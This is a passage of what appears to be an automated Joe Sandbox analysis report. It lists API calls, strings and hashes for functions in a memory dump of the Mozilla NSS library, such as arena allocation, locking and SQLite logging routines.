                                                              • API String ID: 2632744278-0
                                                              • Opcode ID: ed792d8ec55d2e1407fe1a291cddad77eef0ad19d129620838b737ee3286b51a
                                                              • Instruction ID: 1928b3258bb8485cdd0828b8ed6501ea33b3194d76cbc019a21afd74012526f8
                                                              • Opcode Fuzzy Hash: ed792d8ec55d2e1407fe1a291cddad77eef0ad19d129620838b737ee3286b51a
                                                              • Instruction Fuzzy Hash: 59318CB59042019FD710CF19E880A62B7F8AF94358F15806DE948CB208E7F2E990CBA1
                                                              Function 6D0E8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D0E8C1B
                                                              • EnterCriticalSection.KERNEL32 ref: 6D0E8C34
                                                              • PL_ArenaAllocate.NSS3 ref: 6D0E8C65
                                                              • PR_Unlock.NSS3 ref: 6D0E8C9C
                                                              • PR_Unlock.NSS3 ref: 6D0E8CB6
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                              • String ID: KRAM
                                                              • API String ID: 4127063985-3815160215
                                                              • Opcode ID: 5f1f330e2106e29067e02dc88679ec423235b0486d2e9bdca603161302d87478
                                                              • Instruction ID: b9818ff52fa2f045e2c2bee9267f03264d9c45f9c612d8cc7797e1be42f1aca7
                                                              • Opcode Fuzzy Hash: 5f1f330e2106e29067e02dc88679ec423235b0486d2e9bdca603161302d87478
                                                              • Instruction Fuzzy Hash: 1C2171B5904A058FE7009F79C48462DF7F4FF86354F06896ED9888B351EB35D885CB92
                                                              Function 6D1E2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_EnterMonitor.NSS3 ref: 6D1E2CA0
                                                              • PR_ExitMonitor.NSS3 ref: 6D1E2CBE
                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6D1E2CD1
                                                              • strdup.MOZGLUE(?), ref: 6D1E2CE1
                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6D1E2D27
                                                              Strings
                                                              • Loaded library %s (static lib), xrefs: 6D1E2D22
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                              • String ID: Loaded library %s (static lib)
                                                              • API String ID: 3511436785-2186981405
                                                              • Opcode ID: 69ca88199ac15053bd680815930bb55700a456c36f8cf176c77fd74dfdd4be7a
                                                              • Instruction ID: d65e577c2761a4fe3370f42b9be6425596052a3bf30a6dd9bc8c4b6510227f1f
                                                              • Opcode Fuzzy Hash: 69ca88199ac15053bd680815930bb55700a456c36f8cf176c77fd74dfdd4be7a
                                                              • Instruction Fuzzy Hash: 811134B86046028FEB318F55EC54B3777B4AB4538CF06803DEA0A87301D7B19858DFA1
                                                              Function 6D0DBDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6D0DBDCA
                                                                • Part of subcall function 6D130FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D0D87ED,00000800,6D0CEF74,00000000), ref: 6D131000
                                                                • Part of subcall function 6D130FF0: PR_NewLock.NSS3(?,00000800,6D0CEF74,00000000), ref: 6D131016
                                                                • Part of subcall function 6D130FF0: PL_InitArenaPool.NSS3(00000000,security,6D0D87ED,00000008,?,00000800,6D0CEF74,00000000), ref: 6D13102B
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D0DBDDB
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D0DBDEC
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13116E
                                                              • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6D0DBE03
                                                                • Part of subcall function 6D12FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D128D2D,?,00000000,?), ref: 6D12FB85
                                                                • Part of subcall function 6D12FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D12FBB1
                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6D0DBE22
                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6D0DBE30
                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D0DBE3B
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                              • String ID:
                                                              • API String ID: 1821307800-0
                                                              • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                              • Instruction ID: bc1037a47899a43e7f3a5e1f47560187cc7c3960ecf61052e002fc51904853d6
                                                              • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                              • Instruction Fuzzy Hash: D201F9A5A443127BF71016A6BC01F2B669C5F5178DF160036FF049B286FBA1E51582F7
                                                              Function 6D161C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6D161C74
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6D161C92
                                                              • free.MOZGLUE(?), ref: 6D161C99
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6D161CCB
                                                              • free.MOZGLUE(?), ref: 6D161CD2
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalDeleteSectionfree$ErrorValue
                                                              • String ID:
                                                              • API String ID: 3805613680-0
                                                              • Opcode ID: fa21952c646daa4c0163a978334186a9f779f43c7d44b4585b6f14da5f539bf1
                                                              • Instruction ID: 31ef79d76dbdc88cc8dbbc7ad48397c1471df5f239205b64472fd57934f64f05
                                                              • Opcode Fuzzy Hash: fa21952c646daa4c0163a978334186a9f779f43c7d44b4585b6f14da5f539bf1
                                                              • Instruction Fuzzy Hash: 2901D2F5C08661AFDF309FA8AC0DB0F37B8AF0671CF120124EA0A92244D3A09164C7E1
                                                              Function 6D1C1C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6D0C3D77,?,?,6D0C4E1D), ref: 6D1C1C8A
                                                              • sqlite3_free.NSS3(00000000), ref: 6D1C1CB6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_freesqlite3_mprintf
                                                              • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                              • API String ID: 1840970956-3705377941
                                                              • Opcode ID: c46cedcbbe449c5d65b7e744e5f66c2493ad30f933d6ac10aed7127ab21d4640
                                                              • Instruction ID: 11a6e519c60b3bcda46296e3133cfa04f81c2e86cb166c8496da3dbb26e64271
                                                              • Opcode Fuzzy Hash: c46cedcbbe449c5d65b7e744e5f66c2493ad30f933d6ac10aed7127ab21d4640
                                                              • Instruction Fuzzy Hash: 680147B1A041045BD700BF2CE401E72B7E5EFC634CB05487DED44CB202EB72E8A28792
                                                              Function 6D13ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6D13ED6B
                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6D13EDCE
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • free.MOZGLUE(00000000,?,?,?,?,6D13B04F), ref: 6D13EE46
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D13EECA
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6D13EEEA
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6D13EEFB
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                              • String ID:
                                                              • API String ID: 3768380896-0
                                                              • Opcode ID: ff256d4a137ae0af8c7bcb42c9c9b452126586259ff3c71ba519b0c232f1453e
                                                              • Instruction ID: 553f4e328ef25f46dd0d76ae74d42f3ddeac590d2f6ceea9253d423ff96a4b88
                                                              • Opcode Fuzzy Hash: ff256d4a137ae0af8c7bcb42c9c9b452126586259ff3c71ba519b0c232f1453e
                                                              • Instruction Fuzzy Hash: 44818BB5A003169FEB14CF55C884B6B77F5BF88304F064528E915DB255DBB0EE14CBA1
                                                              Function 6D163C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D165B40: PR_GetIdentitiesLayer.NSS3 ref: 6D165B56
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D163D3F
                                                                • Part of subcall function 6D0DBA90: PORT_NewArena_Util.NSS3(00000800,6D163CAF,?), ref: 6D0DBABF
                                                                • Part of subcall function 6D0DBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6D163CAF,?), ref: 6D0DBAD5
                                                                • Part of subcall function 6D0DBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6D163CAF,?), ref: 6D0DBB08
                                                                • Part of subcall function 6D0DBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6D163CAF,?), ref: 6D0DBB1A
                                                                • Part of subcall function 6D0DBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6D163CAF,?), ref: 6D0DBB3B
                                                              • PR_EnterMonitor.NSS3(?), ref: 6D163CCB
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D1990AB
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D1990C9
                                                                • Part of subcall function 6D199090: EnterCriticalSection.KERNEL32 ref: 6D1990E5
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D199116
                                                                • Part of subcall function 6D199090: LeaveCriticalSection.KERNEL32 ref: 6D19913F
                                                              • PR_EnterMonitor.NSS3(?), ref: 6D163CE2
                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D163CF8
                                                              • PR_ExitMonitor.NSS3(?), ref: 6D163D15
                                                              • PR_ExitMonitor.NSS3(?), ref: 6D163D2E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                              • String ID:
                                                              • API String ID: 4030862364-0
                                                              • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                              • Instruction ID: ffe97aa8fea48d4d548dd9b39c92c02ac73ba11a99a35091bae48bc62e80388c
                                                              • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                              • Instruction Fuzzy Hash: 43115B756146406FE7204E69FC417ABB3F9EF11248F894134F61ACA225E2B3F836C662
                                                              Function 6D12FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D12FE08
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D12FE1D
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13116E
                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D12FE29
                                                              • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D12FE3D
                                                              • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D12FE62
                                                              • free.MOZGLUE(00000000,?,?,?,?), ref: 6D12FE6F
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                              • String ID:
                                                              • API String ID: 660648399-0
                                                              • Opcode ID: 1607431b3c88f6aca1b10c0f319a73dc00f6fa0c45dcabe3b1552c8bc4aec038
                                                              • Instruction ID: d845b93e9b98ebd3451e511f371a14f0c4618c889a17b14122ba55ba5d33b284
                                                              • Opcode Fuzzy Hash: 1607431b3c88f6aca1b10c0f319a73dc00f6fa0c45dcabe3b1552c8bc4aec038
                                                              • Instruction Fuzzy Hash: DB110CB65442066BEB014F56EC41F2B73D8AF643A5F078034E93C87216E7B2D990C791
                                                              Function 6D1DFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_Lock.NSS3 ref: 6D1DFD9E
                                                                • Part of subcall function 6D199BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6D0C1A48), ref: 6D199BB3
                                                                • Part of subcall function 6D199BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6D0C1A48), ref: 6D199BC8
                                                              • PR_WaitCondVar.NSS3(000000FF), ref: 6D1DFDB9
                                                                • Part of subcall function 6D0BA900: TlsGetValue.KERNEL32(00000000,?,6D2314E4,?,6D054DD9), ref: 6D0BA90F
                                                                • Part of subcall function 6D0BA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6D0BA94F
                                                              • PR_Unlock.NSS3 ref: 6D1DFDD4
                                                              • PR_Lock.NSS3 ref: 6D1DFDF2
                                                              • PR_NotifyAllCondVar.NSS3 ref: 6D1DFE0D
                                                              • PR_Unlock.NSS3 ref: 6D1DFE23
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                              • String ID:
                                                              • API String ID: 3365241057-0
                                                              • Opcode ID: 544c9abe944eab138d02b5a78a83fd2761007cd2d7f7dec5990ea6afef6a8a34
                                                              • Instruction ID: b02ad24cd5533263ee05d0c73a5fe88edea16dc11459508d46accc0c443f7a09
                                                              • Opcode Fuzzy Hash: 544c9abe944eab138d02b5a78a83fd2761007cd2d7f7dec5990ea6afef6a8a34
                                                              • Instruction Fuzzy Hash: 0E01A1FA908681AFDF264E15FC008127771BB1236C7174375EA29472EAE7A2DD24C681
                                                              Function 6D11FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6D11FC55
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D11FCB2
                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6D11FDB7
                                                              • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6D11FDDE
                                                                • Part of subcall function 6D128800: TlsGetValue.KERNEL32(?,6D13085A,00000000,?,6D0D8369,?), ref: 6D128821
                                                                • Part of subcall function 6D128800: TlsGetValue.KERNEL32(?,?,6D13085A,00000000,?,6D0D8369,?), ref: 6D12883D
                                                                • Part of subcall function 6D128800: EnterCriticalSection.KERNEL32(?,?,?,6D13085A,00000000,?,6D0D8369,?), ref: 6D128856
                                                                • Part of subcall function 6D128800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D128887
                                                                • Part of subcall function 6D128800: PR_Unlock.NSS3(?,?,?,?,6D13085A,00000000,?,6D0D8369,?), ref: 6D128899
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                              • String ID: pkcs11:
                                                              • API String ID: 362709927-2446828420
                                                              • Opcode ID: 89461387428e80a6883d18cc91c29a20e61b70337de69ff4d66767bc9d020783
                                                              • Instruction ID: 4eed9f95d086fc3a598f6154c4eea8e5e6ac4bc3589dc322eb852861df21ce81
                                                              • Opcode Fuzzy Hash: 89461387428e80a6883d18cc91c29a20e61b70337de69ff4d66767bc9d020783
                                                              • Instruction Fuzzy Hash: BC51D2B7A1C1129BEF118F689C40F7A3365BF51318F064034EE295B299EBF1E941DB92
                                                              Function 6D05BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcmp.VCRUNTIME140(00000000,?,?), ref: 6D05BE02
                                                                • Part of subcall function 6D189C40: memcmp.VCRUNTIME140(?,00000000,6D05C52B), ref: 6D189D53
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D05BE9F
                                                              Strings
                                                              • %s at line %d of [%.10s], xrefs: 6D05BE98
                                                              • database corruption, xrefs: 6D05BE93
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D05BE89
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
